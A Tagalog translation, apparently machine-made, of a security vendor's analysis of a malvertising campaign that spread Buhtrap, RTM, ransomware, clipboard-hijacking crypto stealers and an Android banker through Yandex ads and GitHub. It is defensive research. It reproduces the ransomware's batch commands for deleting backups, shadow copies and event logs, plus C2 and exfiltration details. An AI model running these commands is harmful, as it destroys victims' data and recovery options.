Upang i-target ang mga accountant sa isang cyber attack, maaari mong gamitin ang mga dokumento sa trabaho na hinahanap nila online. Ito ay halos kung ano ang ginagawa ng isang cyber group sa nakalipas na ilang buwan, na namamahagi ng mga kilalang backdoor. и , pati na rin ang mga encryptor at software para sa pagnanakaw ng mga cryptocurrencies. Karamihan sa mga target ay matatagpuan sa Russia. Ang pag-atake ay isinagawa sa pamamagitan ng paglalagay ng malisyosong advertising sa Yandex.Direct. Ang mga potensyal na biktima ay idinirekta sa isang website kung saan hiniling sa kanila na mag-download ng isang malisyosong file na itinago bilang isang template ng dokumento. Inalis ng Yandex ang nakakahamak na advertising pagkatapos ng aming babala.
Ang source code ng Buhtrap ay na-leak online sa nakaraan upang magamit ito ng sinuman. Wala kaming impormasyon tungkol sa availability ng RTM code.
Sa post na ito, sasabihin namin sa iyo kung paano ipinamahagi ng mga umaatake ang malware gamit ang Yandex.Direct at na-host ito sa GitHub. Ang post ay magtatapos sa isang teknikal na pagsusuri ng malware.
Buhtrap at RTM ay bumalik sa negosyo
Mekanismo ng pagkalat at mga biktima
Ang iba't ibang mga kargamento na inihatid sa mga biktima ay nagbabahagi ng isang karaniwang mekanismo ng pagpapalaganap. Ang lahat ng mga nakakahamak na file na nilikha ng mga umaatake ay inilagay sa dalawang magkaibang GitHub repository.
Karaniwan, ang repository ay naglalaman ng isang nada-download na nakakahamak na file, na madalas na nagbabago. Dahil pinapayagan ka ng GitHub na tingnan ang kasaysayan ng mga pagbabago sa isang repositoryo, makikita namin kung anong malware ang ipinamahagi sa isang partikular na panahon. Upang kumbinsihin ang biktima na i-download ang malisyosong file, ginamit ang website na blanki-shabloni24[.]ru, na ipinapakita sa figure sa itaas.
Ang disenyo ng site at lahat ng pangalan ng mga malisyosong file ay sumusunod sa isang konsepto - mga form, template, kontrata, sample, atbp. Isinasaalang-alang na ang Buhtrap at RTM software ay nagamit na sa mga pag-atake sa mga accountant sa nakaraan, ipinapalagay namin na ang ang diskarte sa bagong kampanya ay pareho. Ang tanging tanong ay kung paano nakarating ang biktima sa site ng mga umaatake.
Impeksiyon
Hindi bababa sa ilang mga potensyal na biktima na napunta sa site na ito ay naakit ng malisyosong advertising. Nasa ibaba ang isang halimbawang URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Tulad ng nakikita mo mula sa link, ang banner ay nai-post sa lehitimong accounting forum na bb.f2[.]kz. Mahalagang tandaan na ang mga banner ay lumabas sa iba't ibang mga site, lahat ay may parehong campaign id (blanki_rsya), at pinaka nauugnay sa mga serbisyo ng accounting o legal na tulong. Ipinapakita ng URL na ginamit ng potensyal na biktima ang kahilingang "pag-download ng invoice form," na sumusuporta sa aming hypothesis ng mga naka-target na pag-atake. Nasa ibaba ang mga site kung saan lumitaw ang mga banner at ang kaukulang mga query sa paghahanap.
- i-download ang invoice form – bb.f2[.]kz
- sample na kasunduan - Ipopen[.]ru
- sample ng reklamo sa aplikasyon - 77metrov[.]ru
- form ng kasunduan - blank-dogovor-kupli-prodazhi[.]ru
- sample na petisyon sa korte - zen.yandex[.]ru
- sample na reklamo - yurday[.]ru
- sample na mga form ng kontrata – Regforum[.]ru
- form ng kontrata – assistentus[.]ru
- sample na kasunduan sa apartment – napravah[.]com
- mga halimbawa ng mga legal na kontrata - avito[.]ru
Ang blanki-shabloni24[.]ru site ay maaaring na-configure upang pumasa sa isang simpleng visual na pagtatasa. Karaniwan, ang isang ad na tumuturo sa isang mukhang propesyonal na site na may link sa GitHub ay hindi mukhang isang bagay na malinaw na masama. Bilang karagdagan, ang mga umaatake ay nag-upload ng mga nakakahamak na file sa repositoryo lamang para sa isang limitadong panahon, malamang sa panahon ng kampanya. Kadalasan, ang GitHub repository ay naglalaman ng isang walang laman na zip archive o isang blangkong EXE file. Kaya, maaaring ipamahagi ng mga umaatake ang advertising sa pamamagitan ng Yandex.Direct sa mga site na malamang na binisita ng mga accountant na dumating bilang tugon sa mga partikular na query sa paghahanap.
Susunod, tingnan natin ang iba't ibang mga payload na ipinamahagi sa ganitong paraan.
Pagsusuri ng Payload
Kronolohiya ng pamamahagi
Nagsimula ang malisyosong kampanya sa katapusan ng Oktubre 2018 at aktibo sa oras ng pagsulat. Dahil available sa publiko ang buong repository sa GitHub, nag-compile kami ng tumpak na timeline ng pamamahagi ng anim na magkakaibang pamilya ng malware (tingnan ang figure sa ibaba). Nagdagdag kami ng linyang nagpapakita kung kailan natuklasan ang link ng banner, gaya ng sinusukat ng ESET telemetry, para sa paghahambing sa kasaysayan ng git. Tulad ng nakikita mo, ito ay mahusay na nauugnay sa pagkakaroon ng payload sa GitHub. Ang pagkakaiba sa katapusan ng Pebrero ay maaaring ipaliwanag sa pamamagitan ng katotohanang wala kaming bahagi ng history ng pagbabago dahil inalis ang repositoryo sa GitHub bago namin ito makuha nang buo.
Figure 1. Kronolohiya ng pamamahagi ng malware.
Mga Sertipiko sa Pagpirma ng Code
Gumamit ang kampanya ng maraming sertipiko. Ang ilan ay nilagdaan ng higit sa isang pamilya ng malware, na higit na nagpapahiwatig na ang iba't ibang mga sample ay kabilang sa parehong kampanya. Sa kabila ng pagkakaroon ng pribadong susi, hindi sistematikong nilagdaan ng mga operator ang mga binary at hindi ginamit ang susi para sa lahat ng mga sample. Noong huling bahagi ng Pebrero 2019, nagsimulang gumawa ng mga di-wastong lagda ang mga umaatake gamit ang isang certificate na pagmamay-ari ng Google kung saan wala silang pribadong key.
Ang lahat ng mga certificate na kasangkot sa kampanya at ang mga pamilya ng malware na kanilang pinirmahan ay nakalista sa talahanayan sa ibaba.
Ginamit din namin ang mga certificate signing code na ito upang magtatag ng mga link sa ibang mga pamilya ng malware. Para sa karamihan ng mga certificate, hindi kami nakakita ng mga sample na hindi ipinamahagi sa pamamagitan ng isang GitHub repository. Gayunpaman, ginamit ang sertipiko ng TOV "MARIYA" upang pirmahan ang malware na kabilang sa botnet , adware at mga minero. Malamang na ang malware na ito ay nauugnay sa kampanyang ito. Malamang, ang sertipiko ay binili sa darknet.
Win32/Filecoder.Buhtrap
Ang unang bahagi na nakakuha ng aming pansin ay ang bagong natuklasang Win32/Filecoder.Buhtrap. Ito ay isang Delphi binary file na kung minsan ay nakabalot. Pangunahing ipinamahagi ito noong Pebrero–Marso 2019. Ito ay kumikilos ayon sa nararapat sa isang ransomware program - hinahanap nito ang mga lokal na drive at mga folder ng network at ini-encrypt ang mga nakitang file. Hindi nito kailangan ng koneksyon sa Internet upang makompromiso dahil hindi ito nakikipag-ugnayan sa server upang magpadala ng mga susi sa pag-encrypt. Sa halip, nagdaragdag ito ng "token" sa dulo ng mensahe ng ransom, at nagmumungkahi ng paggamit ng email o Bitmessage upang makipag-ugnayan sa mga operator.
Upang i-encrypt ang pinakamaraming sensitibong mapagkukunan hangga't maaari, ang Filecoder.Buhtrap ay nagpapatakbo ng isang thread na idinisenyo upang isara ang pangunahing software na maaaring may mga bukas na tagapangasiwa ng file na naglalaman ng mahalagang impormasyon na maaaring makagambala sa pag-encrypt. Ang mga target na proseso ay pangunahing database management system (DBMS). Bilang karagdagan, ang Filecoder.Buhtrap ay nagtatanggal ng mga log file at backup upang gawing mahirap ang pagbawi ng data. Upang gawin ito, patakbuhin ang batch script sa ibaba.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Gumagamit ang Filecoder.Buhtrap ng isang lehitimong online na serbisyo ng IP Logger na idinisenyo upang mangolekta ng impormasyon tungkol sa mga bisita sa website. Ito ay nilayon upang subaybayan ang mga biktima ng ransomware, na siyang responsibilidad ng command line:
mshta.exe "javascript:document.write('');"
Pinipili ang mga file para sa pag-encrypt kung hindi tumugma ang mga ito sa tatlong listahan ng pagbubukod. Una, ang mga file na may mga sumusunod na extension ay hindi naka-encrypt: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys at .bat. Pangalawa, ang lahat ng mga file kung saan ang buong path ay naglalaman ng mga string ng direktoryo mula sa listahan sa ibaba ay hindi kasama.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Pangatlo, ang ilang mga pangalan ng file ay hindi rin kasama sa pag-encrypt, kasama ng mga ito ang pangalan ng file ng mensahe ng ransom. Ang listahan ay ipinakita sa ibaba. Malinaw, ang lahat ng mga pagbubukod na ito ay inilaan upang panatilihing tumatakbo ang makina, ngunit may kaunting pagiging karapat-dapat sa kalsada.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Scheme ng pag-encrypt ng file
Kapag naisakatuparan, ang malware ay bumubuo ng isang 512-bit na RSA key na pares. Ang pribadong exponent (d) at modulus (n) ay pagkatapos ay naka-encrypt gamit ang isang hard-coded 2048-bit public key (public exponent at modulus), zlib-packed, at base64 na naka-encode. Ang code na responsable para dito ay ipinapakita sa Figure 2.
Figure 2. Resulta ng Hex-Rays decompilation ng 512-bit RSA key pair generation process.
Nasa ibaba ang isang halimbawa ng plain text na may nabuong pribadong key, na isang token na naka-attach sa mensahe ng ransom.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Ang pampublikong susi ng mga umaatake ay ibinigay sa ibaba.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Ang mga file ay naka-encrypt gamit ang AES-128-CBC na may 256-bit na key. Para sa bawat naka-encrypt na file, isang bagong key at isang bagong initialization vector ang bubuo. Ang pangunahing impormasyon ay idinagdag sa dulo ng naka-encrypt na file. Isaalang-alang natin ang format ng naka-encrypt na file.
Ang mga naka-encrypt na file ay may sumusunod na header:
Ang data ng source file na may pagdaragdag ng VEGA magic value ay naka-encrypt sa unang 0x5000 bytes. Ang lahat ng impormasyon sa pag-decryption ay naka-attach sa isang file na may sumusunod na istraktura:
- Ang marker ng laki ng file ay naglalaman ng marka na nagsasaad kung ang file ay mas malaki sa 0x5000 bytes ang laki
— AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key ng nabuong RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hard-coded RSA public key))
Win32/ClipBanker
Ang Win32/ClipBanker ay isang bahagi na paputol-putol na ipinamahagi mula sa huling bahagi ng Oktubre hanggang unang bahagi ng Disyembre 2018. Ang tungkulin nito ay subaybayan ang mga nilalaman ng clipboard, naghahanap ito ng mga address ng mga wallet ng cryptocurrency. Nang matukoy ang target na wallet address, pinapalitan ito ng ClipBanker ng isang address na pinaniniwalaang pagmamay-ari ng mga operator. Ang mga sample na aming sinuri ay hindi naka-box o na-obfuscate. Ang tanging mekanismo na ginagamit upang i-mask ang pag-uugali ay ang pag-encrypt ng string. Ang mga address ng operator wallet ay naka-encrypt gamit ang RC4. Ang mga target na cryptocurrencies ay Bitcoin, Bitcoin cash, Dogecoin, Ethereum at Ripple.
Sa panahon ng pagkalat ng malware sa mga wallet ng Bitcoin ng mga umaatake, isang maliit na halaga ang ipinadala sa VTS, na nagdududa sa tagumpay ng kampanya. Bukod pa rito, walang ebidensyang magmumungkahi na ang mga transaksyong ito ay may kaugnayan sa ClipBanker.
Win32/RTM
Ang bahagi ng Win32/RTM ay ipinamahagi nang ilang araw noong unang bahagi ng Marso 2019. Ang RTM ay isang Trojan banker na nakasulat sa Delphi, na naglalayon sa mga malalayong sistema ng pagbabangko. Noong 2017, inilathala ng mga mananaliksik ng ESET ng programang ito, may kaugnayan pa rin ang paglalarawan. Noong Enero 2019, inilabas din ang Palo Alto Networks .
Buhtrap Loader
Sa loob ng ilang panahon, available ang isang downloader sa GitHub na hindi katulad ng mga dating tool ng Buhtrap. Lumingon siya sa https://94.100.18[.]67/RSS.php?<some_id> upang makuha ang susunod na yugto at direktang i-load ito sa memorya. Dalawang pag-uugali ng pangalawang yugto ng code ay maaaring makilala. Sa unang URL, direktang ipinasa ng RSS.php ang backdoor ng Buhtrap - ang backdoor na ito ay halos kapareho sa magagamit pagkatapos ma-leak ang source code.
Kapansin-pansin, nakakakita kami ng ilang campaign na may backdoor ng Buhtrap, at pinapatakbo umano ang mga ito ng iba't ibang operator. Sa kasong ito, ang pangunahing pagkakaiba ay ang backdoor ay na-load nang direkta sa memorya at hindi gumagamit ng karaniwang pamamaraan sa proseso ng pag-deploy ng DLL na aming pinag-usapan. . Bilang karagdagan, binago ng mga operator ang RC4 key na ginamit upang i-encrypt ang trapiko ng network sa C&C server. Sa karamihan ng mga kampanyang nakita namin, hindi nag-abala ang mga operator na baguhin ang key na ito.
Ang pangalawa, mas kumplikadong pag-uugali ay ang RSS.php URL ay ipinasa sa isa pang loader. Nagpatupad ito ng ilang obfuscation, tulad ng muling pagbuo ng dynamic na import table. Ang layunin ng bootloader ay makipag-ugnayan sa server ng C&C [.]com/api/F27F84EDA4D13B15/2, ipadala ang mga log at maghintay ng tugon. Pinoproseso nito ang tugon bilang isang patak, nilo-load ito sa memorya at isinasagawa ito. Ang payload na nakita naming nagpapagana ng loader na ito ay ang parehong Buhtrap backdoor, ngunit maaaring may iba pang mga bahagi.
Android/Spy.Banker
Kapansin-pansin, natagpuan din ang isang bahagi para sa Android sa repositoryo ng GitHub. Isang araw lang siya sa main branch - November 1, 2018. Bukod sa nai-post sa GitHub, ang ESET telemetry ay walang nakitang ebidensya ng malware na ito na ipinamamahagi.
Ang bahagi ay na-host bilang isang Android Application Package (APK). Ito ay lubos na natataranta. Nakatago ang nakakahamak na gawi sa isang naka-encrypt na JAR na matatagpuan sa APK. Ito ay naka-encrypt gamit ang RC4 gamit ang key na ito:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Ang parehong key at algorithm ay ginagamit upang i-encrypt ang mga string. Ang JAR ay matatagpuan sa APK_ROOT + image/files. Ang unang 4 na byte ng file ay naglalaman ng haba ng naka-encrypt na JAR, na magsisimula kaagad pagkatapos ng field ng haba.
Nang ma-decrypt ang file, natuklasan namin na ito ay Anubis - dati bangkero para sa Android. Ang malware ay may mga sumusunod na tampok:
- pag-record ng mikropono
- pagkuha ng mga screenshot
- pagkuha ng mga coordinate ng GPS
- keylogger
- pag-encrypt ng data ng device at paghingi ng ransom
- spamming
Kapansin-pansin, ginamit ng bangkero ang Twitter bilang isang backup na channel ng komunikasyon upang makakuha ng isa pang server ng C&C. Ginamit ng sample na sinuri namin ang @JonesTrader account, ngunit sa oras ng pagsusuri ay na-block na ito.
Naglalaman ang banker ng listahan ng mga target na application sa Android device. Mas mahaba ito kaysa sa listahang nakuha sa pag-aaral ng Sophos. Kasama sa listahan ang maraming application sa pagbabangko, mga online shopping program tulad ng Amazon at eBay, at mga serbisyo ng cryptocurrency.
MSIL/ClipBanker.IH
Ang huling bahagi na ipinamahagi bilang bahagi ng campaign na ito ay ang .NET Windows executable, na lumabas noong Marso 2019. Karamihan sa mga bersyon na pinag-aralan ay nakabalot sa ConfuserEx v1.0.0. Tulad ng ClipBanker, ginagamit ng bahaging ito ang clipboard. Ang kanyang layunin ay isang malawak na hanay ng mga cryptocurrencies, pati na rin ang mga alok sa Steam. Bukod pa rito, ginagamit niya ang serbisyo ng IP Logger para nakawin ang Bitcoin private WIF key.
Mga Mekanismo ng Proteksyon
Bilang karagdagan sa mga benepisyong ibinibigay ng ConfuserEx sa pagpigil sa pag-debug, pagla-dumping, at pakikialam, kasama sa bahagi ang kakayahang makakita ng mga produktong antivirus at virtual machine.
Upang i-verify na ito ay tumatakbo sa isang virtual machine, ginagamit ng malware ang built-in na Windows WMI command line (WMIC) upang humiling ng impormasyon ng BIOS, ibig sabihin:
wmic bios
Pagkatapos ay pina-parse ng program ang output ng command at naghahanap ng mga keyword: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Upang matukoy ang mga produktong antivirus, nagpapadala ang malware ng kahilingan sa Windows Management Instrumentation (WMI) sa Windows Security Center gamit ang ManagementObjectSearcher API tulad ng ipinapakita sa ibaba. Pagkatapos mag-decode mula sa base64 ang tawag ay ganito:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figure 3. Proseso para sa pagtukoy ng mga produktong antivirus.
Bilang karagdagan, sinusuri ng malware kung , isang tool upang maprotektahan laban sa mga pag-atake sa clipboard at, kung tumatakbo, sinuspinde ang lahat ng mga thread sa prosesong iyon, at sa gayon ay hindi pinapagana ang proteksyon.
Pagtitiyaga
Ang bersyon ng malware na pinag-aralan namin ay kinokopya ang sarili nito %APPDATA%googleupdater.exe at itinatakda ang katangiang "nakatagong" para sa direktoryo ng google. Pagkatapos ay binago niya ang halaga SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell sa Windows registry at idinagdag ang path updater.exe. Sa ganitong paraan, isasagawa ang malware sa tuwing magla-log in ang user.
Malicious behavior
Tulad ng ClipBanker, sinusubaybayan ng malware ang mga nilalaman ng clipboard at naghahanap ng mga address ng cryptocurrency wallet, at kapag natagpuan, papalitan ito ng isa sa mga address ng operator. Nasa ibaba ang isang listahan ng mga target na address batay sa kung ano ang makikita sa code.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Para sa bawat uri ng address ay may kaukulang regular na expression. Ang halaga ng STEAM_URL ay ginagamit upang atakehin ang Steam system, tulad ng makikita mula sa regular na expression na ginagamit upang tukuyin sa buffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Exfiltration channel
Bilang karagdagan sa pagpapalit ng mga address sa buffer, tina-target ng malware ang mga pribadong WIF key ng Bitcoin, Bitcoin Core at Electrum Bitcoin wallet. Ang programa ay gumagamit ng plogger.org bilang isang exfiltration channel upang makuha ang WIF private key. Upang gawin ito, nagdaragdag ang mga operator ng pribadong key data sa header ng User-Agent HTTP, tulad ng ipinapakita sa ibaba.
Figure 4. IP Logger console na may output data.
Hindi ginamit ng mga operator ang iplogger.org para i-exfiltrate ang mga wallet. Malamang na gumamit sila ng ibang paraan dahil sa 255 character na limitasyon sa field User-Agentipinapakita sa web interface ng IP Logger. Sa mga sample na aming pinag-aralan, ang ibang output server ay naka-imbak sa environment variable DiscordWebHook. Nakakagulat, ang environment variable na ito ay hindi nakatalaga kahit saan sa code. Iminumungkahi nito na ang malware ay nasa ilalim pa rin ng pag-unlad at ang variable ay itinalaga sa test machine ng operator.
May isa pang palatandaan na ang programa ay nasa pag-unlad. Kasama sa binary file ang dalawang URL ng iplogger.org, at pareho silang na-query kapag na-exfiltrate ang data. Sa isang kahilingan sa isa sa mga URL na ito, ang halaga sa field ng Referer ay pinangungunahan ng “DEV /”. Nakakita rin kami ng bersyon na hindi naka-package gamit ang ConfuserEx, ang tatanggap para sa URL na ito ay pinangalanang DevFeedbackUrl. Batay sa pangalan ng variable ng kapaligiran, naniniwala kami na pinaplano ng mga operator na gamitin ang lehitimong serbisyong Discord at ang web interception system nito upang magnakaw ng mga wallet ng cryptocurrency.
Konklusyon
Ang kampanyang ito ay isang halimbawa ng paggamit ng mga lehitimong serbisyo sa advertising sa mga cyber attack. Tina-target ng scheme ang mga organisasyong Ruso, ngunit hindi kami magugulat na makita ang gayong pag-atake gamit ang mga serbisyong hindi Ruso. Upang maiwasan ang kompromiso, ang mga user ay dapat magtiwala sa reputasyon ng pinagmulan ng software na kanilang dina-download.
Ang kumpletong listahan ng mga indicator ng kompromiso at mga katangian ng MITRE ATT&CK ay makukuha sa .
Pinagmulan: www.habr.com